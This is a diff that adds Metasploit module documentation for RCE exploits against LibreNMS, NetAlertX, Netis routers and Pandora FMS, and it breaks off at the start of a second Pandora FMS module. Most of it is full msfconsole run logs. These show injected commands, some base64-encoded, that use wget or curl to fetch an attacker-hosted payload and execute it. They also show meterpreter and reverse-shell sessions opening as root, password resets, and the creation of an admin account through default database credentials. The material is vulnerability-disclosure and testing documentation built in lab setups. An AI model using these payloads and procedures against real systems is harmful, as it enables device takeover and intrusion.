+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     80               yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   USERNAME                   yes       User name for LibreNMS
+   VHOST                      no        HTTP server virtual host
+   WAIT      315              yes       Wait time (seconds) for cron to poll the device
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      n                no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH       s                no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.0.12     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/librenms_authenticated_rce_cve_2024_51092) > run lhost=192.168.56.1 rhost=192.168.56.17 username=librenms password=librenms
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Successfully logged into LibreNMS.
+[+] The target appears to be vulnerable. LibreNMS version 24.9.1 detected, which is vulnerable.
+[*] Try to add host: 'f;echo d2dldCAtcU8gLi9uIGh0dHA6Ly8xOTIuMTY4LjU2LjE6ODA4MC9zO2NobW9kICt4IC4vbjsuL24m|base64 -d|bash;#', length: 100
+[*] Added host.
+[*] Actual payload: wget -qO ./n http://192.168.56.1:8080/s;chmod +x ./n;./n&
+[*] Waiting up to 315 seconds for cron to poll the device...
+[*] Sending stage (3045380 bytes) to 192.168.56.17
+[+] Deleted n
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:40228) at 2025-01-17 21:19:20 +0900
+[*] Reset snmpget to default.
+[*] Deleted device: 353
+
+meterpreter > getuid
+Server username: librenms
+meterpreter > sysinfo
+Computer     : 192.168.56.17
+OS           : Ubuntu 22.04 (Linux 6.8.0-50-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,110 @@
+## Vulnerable Application
+
+An attacker can update NetAlertX settings with no authentication, which results in RCE.
+
+The vulnerability affects:
+
+    * v23.01.14 <= NetAlertX <= v24.9.12
+
+This module was successfully tested on:
+
+    * NetAlertX v24.9.12 installed with Docker on Ubuntu 22.04
+
+
+### Installation
+
+1. `docker pull jokobsk/netalertx:24.9.12`
+
+2. docker run
+```bash
+docker run --rm --network=host \
+  -v /tmp/netalertx:/app/config \
+  -v /tmp/netalertx:/app/db \
+  -e TZ=Europe/Berlin \
+  -e PORT=20211 \
+  jokobsk/netalertx:24.9.12
+```
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/netalertx_rce_cve_2024_46506`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+### WAIT (required)
+Wait time (seconds) for the payload to be set. Default is `75`.
+
+### CLEANUP
+Restore DBCLNP_CMD to original value after execution. Default is `true`.
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/netalertx_rce_cve_2024_46506
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/netalertx_rce_cve_2024_46506) > options
+
+Module options (exploit/linux/http/netalertx_rce_cve_2024_46506):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CLEANUP  true             no        Restore DBCLNP_CMD to original value after execution
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    20211            yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+   WAIT     75               yes       Wait time (seconds) for the payload to be set
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      GXIuXvsu         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.0.12     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/netalertx_rce_cve_2024_46506) > run lhost=192.168.56.1 rhost=192.168.56.17
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 24.9.12 detected.
+[*] Sent request to update DBCLNP_CMD to '/bin/bash -c echo${IFS}Y3VybCAtc28gLi9QWHhyY3hFRCBodHRwOi8vMTkyLjE2OC41Ni4xOjgwODAvRy04Zjhua29IMGRUWkdQc052UzIzZztjaG1vZCAreCAuL1BYeHJjeEVEOy4vUFh4cmN4RUQmc2xlZXAgNztybSAtcmYgLi9QWHhyY3hFRA==|base64${IFS}-d|/bin/bash'.
+[*] Waiting settings really updated...
+[*] Sending stage (3045380 bytes) to 192.168.56.17
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:57510) at 2025-02-10 21:57:30 +0900
+[*] Added the payload to the queue. Waiting for the payload to run...
+[*] Sent request to update DBCLNP_CMD to 'python3 /app/front/plugins/db_cleanup/script.py pluginskeephistory={pluginskeephistory} hourstokeepnewdevice={hourstokeepnewdevice} daystokeepevents={daystokeepevents} pholuskeepdays={pholuskeepdays}'.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.56.17
+OS           :  (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,289 @@
+## Vulnerable Application
+Several Netis Routers including rebranded routers from GLCtec and Stonet suffer from a command injection vulnerability at the change
+password page of the router web interface (see [CVE-2024-48456](https://www.cve.org/CVERecord?id=CVE-2024-48456) for more details).
+The vulnerability stems from improper handling of the password and new password parameter within the router's web interface.
+Attackers can inject a command in the password or new password parameter, encoded in base64, to exploit the command injection
+vulnerability.
+When exploited, this can lead to command execution, potentially allowing the attacker to take full control of the router.
+An attacker needs to be authenticated to initiate this RCE, however [CVE-2024-48457](https://www.cve.org/CVERecord?id=CVE-2024-48457)
+allows an unauthenticated attacker to reset the Wifi and router password, hence gaining full root access to the router to execute
+the RCE.
+
+Last but not least, [CVE-2024-48455](https://www.cve.org/CVERecord?id=CVE-2024-48455) allows for unauthenticated information disclosure
+revealing sensitive configuration information of the router which can be used by the attacker to determine if the router is running
+specific vulnerable firmware.
+
+The following router firmware versions are vulnerable:
+
+- [x] netis_MW5360_V1.0.1.3031_fw.bin
+- [x] Netis_MW5360-1.0.1.3442.bin
+- [x] Netis_MW5360_RUSSIA_844.bin
+- [x] netis_NC21_V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=40)
+- [x] netis_NC63_V3.0.0.3327.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
+- [x] netis_NC63_v4_Bangladesh-V3.0.0.3889.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
+- [x] Netis_NC63-V3.0.0.3833.bin (https://www.netisru.com/support/downinfo.html?id=35)
+- [x] netis_app_BeeWiFi_NC63_v4_Bangladesh-V3.0.0.3503.bin
+- [x] netis_NC65_V3.0.0.3749.bin
+- [x] Netis_NC65_Bangladesh-V3.0.0.3508.bin (https://www.netis-systems.com/support/downinfo.html?id=34)
+- [x] Netis_NC65v2-V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=34)
+- [x] netis_NX10_V2.0.1.3582_fw.bin
+- [x] netis_NX10_V2.0.1.3643.bin
+- [x] Netis_NX10_v1_Bangladesh-V3.0.0.4142.bin (https://www.netis-systems.com/support/downinfo.html?id=33)
+- [x] netis_NX10-V3.0.1.4205.bin (https://www.netisru.com/support/downinfo.html?id=33)
+- [x] netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3329.bin
+- [x] netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3500.bin
+- [x] Netis_NC21_v2_Bangladesh-V3.0.0.3854.bin (https://www.netis-systems.com/support/downinfo.html?id=40)
+- [x] GLC_ALPHA_AC3-V3.0.2.115.bin (https://drive.google.com/drive/folders/1P69yUfzeZeR6oABmIdcJ6fG57-Xjrzx6)
+
+and potentially others...
+
+## Installation
+Ideally, to test this module, you would need a vulnerable Netis Router device.
+However, by downloading the firmware and install and use `FirmAE` to emulate the router,
+we can simulate the router and test the vulnerable endpoint.
+
+### Installation steps to emulate the router firmware with FirmAE
+* Install `FirmAE` on your Linux distribution using the installation instructions provided [here](https://github.com/pr0v3rbs/FirmAE).
+* To emulate the specific firmware that comes with the Netis devices, `binwalk` might need to be able to handle a sasquatch filesystem.
+* This requires additional [installation steps](https://gist.github.com/thanoskoutr/4ea24a443879aa7fc04e075ceba6f689).
+* Please do not forget to run this after your `FirmAE` installation otherwise you will not be able to extract the firmware.
+* Download the vulnerable firmware from Netis or from one of the other brands like GLCtec or Stonet.
+* We will pick `GLC_ALPHA_AC3-V3.0.2.115.bin` for the demonstration.
+* Start emulation.
+* First run `./init.sh` to initialize and start the Postgress database.
+* Start a debug session  `./run.sh -d Netis /root/FirmAE/firmwares/GLC_ALPHA_AC3-V3.0.2.115.bin`
+* This will take a while, but in the end you should see the following...
+```shell
+ # ./run.sh -d netis /root/FirmAE/firmwares/GLC_ALPHA_AC3-V3.0.2.115.bin
+[*] /root/FirmAE/firmwares/GLC_ALPHA_AC3-V3.0.2.115.bin emulation start!!!
+[*] extract done!!!
+[*] get architecture done!!!
+mke2fs 1.47.0 (5-Feb-2023)
+e2fsck 1.47.0 (5-Feb-2023)
+[*] infer network start!!!
+[IID] 15
+[MODE] debug
+[+] Network reachable on 192.168.1.254!
+[+] Web service on 192.168.1.254
+[+] Run debug!
+Creating TAP device tap15_0...
+Set 'tap15_0' persistent and owned by uid 0
+Bringing up TAP device...
+Starting emulation of firmware... 192.168.1.254 true true 79.316641060 186.772281412
+/root/FirmAE/./debug.py:7: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
+  import telnetlib
+[*] firmware - GLC_ALPHA_AC3-V3.0.2.115
+[*] IP - 192.168.1.254
+[*] connecting to netcat (192.168.1.254:31337)
+[+] netcat connected
+------------------------------
+|       FirmAE Debugger      |
+------------------------------
+1. connect to socat
+2. connect to shell
+3. tcpdump
+4. run gdbserver
+5. file transfer
+6. exit
+```
+* check if you can `ping` the emulated router and run `nmap` to check the ports
+```shell
+ # ping 192.168.1.254
+PING 192.168.1.254 (192.168.1.254) 56(84) bytes of data.
+64 bytes from 192.168.1.254: icmp_seq=1 ttl=64 time=11.7 ms
+64 bytes from 192.168.1.254: icmp_seq=2 ttl=64 time=4.93 ms
+64 bytes from 192.168.1.254: icmp_seq=3 ttl=64 time=1.30 ms
+^C
+--- 192.168.1.254 ping statistics ---
+3 packets transmitted, 3 received, 0% packet loss, time 2003ms
+rtt min/avg/max/mdev = 1.297/5.979/11.713/4.316 ms
+ # nmap 192.168.1.254
+Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 19:39 UTC
+Nmap scan report for 192.168.1.254
+Host is up (0.020s latency).
+Not shown: 996 closed tcp ports (reset)
+PORT    STATE SERVICE
+22/tcp  open  ssh
+53/tcp  open  domain
+80/tcp  open  http
+443/tcp open  https
+MAC Address: 00:E0:4C:81:96:C1 (Realtek Semiconductor)
+
+Nmap done: 1 IP address (1 host up) scanned in 1.19 seconds
+```
+You are now ready to test the module using the emulated router hardware on IP address 192.168.1.254
+
+## Verification Steps
+- [x] Start `msfconsole`
+- [x] `use exploit/linux/http/netis_unauth_rce_cve_2024_48456_and_48457`
+- [x] `set rhosts <ip-target>`
+- [x] `set lhost <ip-attacker>`
+- [x] `set target <0=Linux Dropper>`
+- [x] `exploit`
+
+you should get a `Meterpreter` session.
+
+```msf
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > info
+
+       Name: Netis Router Exploit Chain Reactor (CVE-2024-48455, CVE-2024-48456 and CVE-2024-48457).
+     Module: exploit/linux/http/netis_unauth_rce_cve_2024_48456_and_48457
+   Platform: Linux
+       Arch: mipsle
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-12-27
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  CMD_DELAY  30               yes       Delay in seconds between payload commands to avoid locking
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS     192.168.1.254    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
+                                        s/using-metasploit.html
+  RPORT      80               yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       The Netis router endpoint URL
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  VHOST                       no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
+                                      local machine or 0.0.0.0 to listen on all addresses.
+  SRVPORT  1981             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  Several Netis Routers including rebranded routers from GLCtec and Stonet suffer from a command injection
+  vulnerability at the change admin password page of the router web interface (see CVE-2024-48456 for more details).
+  The vulnerability stems from improper handling of the 'password' and 'new password' parameter within the
+  router's web interface. Attackers can inject a command in the 'password' or 'new password' parameter,
+  encoded in base64, to exploit the command injection vulnerability. When exploited, this can lead to
+  command execution, potentially allowing the attacker to take full control of the router.
+  An attacker needs to be authenticated to initiate this RCE, however CVE-2024-48457 allows an unauthenticated
+  attacker to reset the Wifi and router password, hence gaining full admin access to the router to execute the RCE.
+
+  Last but not least, CVE-2024-48455 allows for unauthenticated information disclosure revealing sensitive configuration
+  information of the router which can be used by the attacker to determine if the router is running specific vulnerable
+  firmware.
+
+  The following router firmware versions are vulnerable:
+  * netis_MW5360_V1.0.1.3031_fw.bin
+  * Netis_MW5360-1.0.1.3442.bin
+  * Netis_MW5360_RUSSIA_844.bin
+  * netis_NC21_V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=40)
+  * netis_NC63_V3.0.0.3327.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
+  * netis_NC63_v4_Bangladesh-V3.0.0.3889.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
+  * Netis_NC63-V3.0.0.3833.bin (https://www.netisru.com/support/downinfo.html?id=35)
+  * netis_app_BeeWiFi_NC63_v4_Bangladesh-V3.0.0.3503.bin
+  * netis_NC65_V3.0.0.3749.bin
+  * Netis_NC65_Bangladesh-V3.0.0.3508.bin (https://www.netis-systems.com/support/downinfo.html?id=34)
+  * Netis_NC65v2-V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=34)
+  * netis_NX10_V2.0.1.3582_fw.bin
+  * netis_NX10_V2.0.1.3643.bin
+  * Netis_NX10_v1_Bangladesh-V3.0.0.4142.bin (https://www.netis-systems.com/support/downinfo.html?id=33)
+  * netis_NX10-V3.0.1.4205.bin (https://www.netisru.com/support/downinfo.html?id=33)
+  * netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3329.bin
+  * netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3500.bin
+  * Netis_NC21_v2_Bangladesh-V3.0.0.3854.bin (https://www.netis-systems.com/support/downinfo.html?id=40)
+  * GLC_ALPHA_AC3-V3.0.2.115.bin (https://drive.google.com/drive/folders/1P69yUfzeZeR6oABmIdcJ6fG57-Xjrzx6)
+  * potentially others...
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-48455
+  https://nvd.nist.gov/vuln/detail/CVE-2024-48456
+  https://nvd.nist.gov/vuln/detail/CVE-2024-48457
+  https://github.com/users/h00die-gr3y/projects/1
+
+View the full module info with the info -d command.
+```
+## Options
+### CMD_DELAY
+Chained command lines using `;` do not work, so each command need to be executed in a separate request
+with delay of 30 seconds of more to avoid session locking using the `CMD_DELAY` option.
+
+## Scenarios
+### GLCtec ALPHA-AC3 Router Emulation Linux Dropper -  linux/mipsle/meterpreter_reverse_tcp
+```msf
+msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.1.253:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.1.254:80 can be exploited.
+[+] The target appears to be vulnerable. GLC(ALPHA-AC3)-V3.0.2.115
+[*] Resetting router password for authentication.
+[*] Logging in with the new router password 4vNcez42D to get the password cookie.
+[*] Saving router credentials (root) at the msf database.
+[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.1.253:1981/ZhIplAe6jD9O7J
+[*] Executing wget -qO /tmp/hMvelDeE http://192.168.1.253:1981/ZhIplAe6jD9O7J
+[*] Client 192.168.1.254 (Wget) requested /ZhIplAe6jD9O7J
+[*] Sending payload to 192.168.1.254 (Wget)
+[*] Command Stager progress -  53.85% done (63/117 bytes)
+[*] Executing chmod +x /tmp/hMvelDeE
+[*] Command Stager progress -  72.65% done (85/117 bytes)
+[*] Executing /tmp/hMvelDeE
+[+] Deleted /tmp/hMvelDeE
+[*] Meterpreter session 7 opened (192.168.1.253:4444 -> 192.168.1.254:54551) at 2024-12-29 11:28:49 +0000
+[*] Command Stager progress -  83.76% done (98/117 bytes)
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.1.254
+OS           :  (Linux 3.10.90)
+Architecture : mips
+BuildTuple   : mipsel-linux-muslsf
+Meterpreter  : mipsle/linux
+meterpreter > pwd
+/etc/boa
+meterpreter > ls
+Listing: /etc/boa
+=================
+
+Mode              Size     Type  Last modified              Name
+----              ----     ----  -------------              ----
+100755/rwxr-xr-x  9581     fil   2024-03-04 09:22:46 +0000  boa.conf
+100755/rwxr-xr-x  2118     fil   2024-03-04 09:22:46 +0000  mime.types
+
+meterpreter >
+```
+## Limitations
+Staged payloads might core dump on the target, so use stage-less payloads when using the Linux Dropper target.
+Another limitation is that the router has a very limited command set that can be leveraged,
+so the only option is to use the `wget` command to drop an executable on the target to get a session.
+Chained command lines using `;` do not work, so each command need to be executed in a separate request
+with a delay of 30 seconds or more to avoid session locking (see the `CMD_DELAY` option).
+
+Last but not least, be mindful that the admin router password gets overwritten by the exploit,
+resulting in a clear indicator of compromise.
@@ -0,0 +1,210 @@
+## Vulnerable Application
+Pandora FMS is a monitoring solution that provides full observability for your organization's technology.
+This module exploits an command injection vulnerability in the LDAP authentication mechanism of Pandora FMS.
+You need have admin access at the Pandora FMS Web application in order to execute this RCE.
+This access can be achieved leveraging a default password vulnerability in Pandora FMS that allows an attacker
+to access the Pandora FMS MySQL database, create a new admin user and gain administrative access to the
+Pandora FMS Web application.
+This attack can be remotely executed over the WAN as long as the MySQL services are exposed to the outside world.
+This issue affects Community, Free and Enterprise editions: from `v7.0NG.718` through <= `v7.0NG.777.4`
+
+The following releases were tested.
+
+**Pandora FMS Releases:**
+* Pandora FMS Community Edition v7.0NG.718 (CentOS 7 ISO image)
+* Pandora FMS Community Edition v7.0NG.759 (CentOS 7 ISO image)
+* Pandora FMS Community Edition v7.0NG.777-LTS (Ubuntu 22.04)
+* Pandora FMS Community Edition v7.0NG.772-LTS (Ubuntu 22.04)
+
+## Installation steps to install Pandora FMS Community, Free or Enterprise Editions
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download [Pandora FMS iso](https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/).
+* Install the iso image in your virtualization engine.
+* When installed, configure the VM appliance to your needs using the menu options.
+* Boot up the VM and should be able to access the Pandora FMS appliance either thru the console, `ssh` on port `22`
+* or via the `webui` via `http://your_ip/pandora_console/index.php`.
+
+* Note: from version `v7.0NG.760` follow the installation manual below:
+* [Non ISO installation](https://pandorafms.com/manual/!current/en/documentation/pandorafms/installation/01_installing).
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/linux/http/pandora_fms_auth_rce_cve_2024_11320`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=PHP Command, 1=Unix/Linux Command>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+
+### USERNAME
+This option is optional and is the username (default: admin) to authenticate with the Pandora FMS application.
+
+### PASSWORD
+This option is optional and is the password (default: pandora) in plain text to authenticate with the Pandora FMS application.
+
+### DB_USER
+This option is required and is the username (default: pandora) to authenticate with the Pandora FMS MySQL database.
+
+### DB_PASSWORD
+This option is required and is the password (default: Pandor4!) in plain text to authenticate with the Pandora FMS MySQL database.
+Note: In older versions, this password is set to `pandora` during installation of the application.
+
+### DB_PORT
+This option is required and is the MySQL database port (default: 3306) to connect to the database.
+
+## Scenarios
+```msf
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > info
+
+       Name: Pandora FMS authenticated command injection leading to RCE via LDAP using default DB password
+     Module: exploit/linux/http/pandora_fms_auth_rce_cve_2024_11320
+   Platform: Unix, Linux, PHP
+       Arch: cmd, php
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-11-21
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Askar mhaskar
+
+Module side effects:
+ artifacts-on-disk
+ ioc-in-logs
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   PHP Command
+      1   Unix/Linux Command
+
+Check supported:
+  Yes
+
+Basic options:
+  Name         Current Setting      Required  Description
+  ----         ---------------      --------  -----------
+  DB_NAME      pandora              yes       Pandora database
+  DB_PASSWORD  Pandor4!             yes       Pandora database admin password
+  DB_PORT      3306                 yes       MySQL database port
+  DB_USER      pandora              yes       Pandora database admin user
+  PASSWORD     pandora              no        Pandora web admin password
+  Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
+                                              g-metasploit.html
+  RPORT        80                   yes       The target port (TCP)
+  SSL          false                no        Negotiate SSL/TLS for outgoing connections
+  TARGETURI    /pandora_console     yes       Path to the Pandora FMS application
+  USERNAME     admin                no        Pandora web admin user
+  VHOST                             no        HTTP server virtual host
+
+Payload information:
+
+Description:
+  Pandora FMS is a monitoring solution that provides full observability for your organization's
+  technology. This module exploits an command injection vulnerability in the LDAP authentication
+  mechanism of Pandora FMS.
+  You need have admin access at the Pandora FMS Web application in order to execute this RCE.
+  This access can be achieved leveraging a default password vulnerability in Pandora FMS that
+  allows an attacker to access the Pandora FMS MySQL database, create a new admin user and gain
+  administrative access to the Pandora FMS Web application. This attack can be remotely executed
+  over the WAN as long as the MySQL services are exposed to the outside world.
+  This issue affects Community, Free and Enterprise editions: from v7.0NG.718 through <= v7.0NG.777.4
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-11320
+  https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/
+  https://attackerkb.com/topics/CsDUaLijbT/cve-2024-11320
+
+View the full module info with the info -d command.
+```
+### Pandora FMS v7.0NG.777 on Ubuntu 22.04 -  PHP Command target
+Attack scenario: use the default database credentials (pandora:Pandor4!) to create an admin user in the application
+to gain the privileges for the RCE.
+```msf
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > set password xxx
+password => xxx
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > exploit
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Pandora FMS version v7.0NG.777
+[*] Trying to log in with admin credentials admin:xxx at the Pandora FMS Web application.
+[*] Logging in with admin credentials failed. Trying to connect to the Pandora MySQL server.
+[*] Creating new admin user with credentials cnrjq:jeQsinXxfe for access at the Pandora FMS Web application.
+[*] Trying to log in with new admin credentials cnrjq:jeQsinXxfe at the Pandora FMS Web application.
+[*] Succesfully authenticated at the Pandora FMS Web application.
+[*] Saving admin credentials at the msf database.
+[*] Executing PHP Command for php/meterpreter/reverse_tcp
+[*] Sending stage (40004 bytes) to 192.168.201.6
+[*] Meterpreter session 28 opened (192.168.201.8:4444 -> 192.168.201.6:59242) at 2024-12-22 10:35:05 +0000
+[+] Payload is successful removed from LDAP configuration.
+
+meterpreter > sysinfo
+Computer    : cuckoo
+OS          : Linux cuckoo 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter > pwd
+/var/www/html/pandora_console
+meterpreter >
+```
+###  Pandora FMS v7.0NG.777 on Ubuntu 22.04 - Unix/Linux Command target
+Attack scenario: use the default admin credentials (admin:pandora) of the Pandora FMS application
+to gain the privileges for the RCE.
+```msf
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > set target 1
+target => 1
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > set password pandora
+password => pandora
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > exploit
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Pandora FMS version v7.0NG.777
+[*] Trying to log in with admin credentials admin:pandora at the Pandora FMS Web application.
+[*] Succesfully authenticated at the Pandora FMS Web application.
+[*] Saving admin credentials at the msf database.
+[*] Executing Unix/Linux Command for cmd/unix/reverse_bash
+[*] Command shell session 29 opened (192.168.201.8:4444 -> 192.168.201.6:37616) at 2024-12-22 10:57:58 +0000
+[+] Payload is successful removed from LDAP configuration.
+
+pwd
+/var/www/html/pandora_console
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+uname -a
+Linux cuckoo 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+## Limitations
+In older versions of Pandora FMS, you might run into error 'Unable to login from this host due to policy' if you try to connect
+to the MySQL database with the default database credentials.
+This is caused by the restrictive host settings at the MySQL database which is default set to `localhost` and `127.0.0.1`.
+You can check this with the SQL command below if you have local access to the database.
+```
+SELECT host FROM mysql.user WHERE user = "pandora";
+-----------+
+| host      |
+-----------+
+| 127.0.0.1 |
+| localhost |
+-----------+
+```
+In newer versions of Pandora FMS, this has been changed to '%' which allow any host to connect to the database.
@@ -0,0 +1,185 @@
+## Vulnerable Application
+Pandora FMS is a monitoring solution that provides full observability for your organization's technology.
+This module exploits an command injection vulnerability in the `chromium-path` or `phantomjs-bin` directory
+setting at the application settings page of Pandora FMS.
+You need have admin access at the Pandora FMS Web application in order to execute this RCE.
+This access can be achieved by knowing the admin credentials to access the web application or leveraging a default
+password vulnerability in Pandora FMS that allows an attacker to access the Pandora FMS MySQL database,
+create a new admin user and gain administrative access to the Pandora FMS Web application.
+This attack can be remotely executed over the WAN as long as the MySQL services are exposed to the outside world.
+This issue affects Community, Free and Enterprise editions:
+ - chromium-path: from v7.0NG.768 through <= v7.0NG.780
+ - phantomjs-bin: from v7.0NG.724 through <= v7.0NG.767
+
+Note: use target setting 2 "Tiny Reverse Netcat Command" for versions <= v7.0NG.738
+
+The following releases were tested.
+
+**Pandora FMS Releases:**
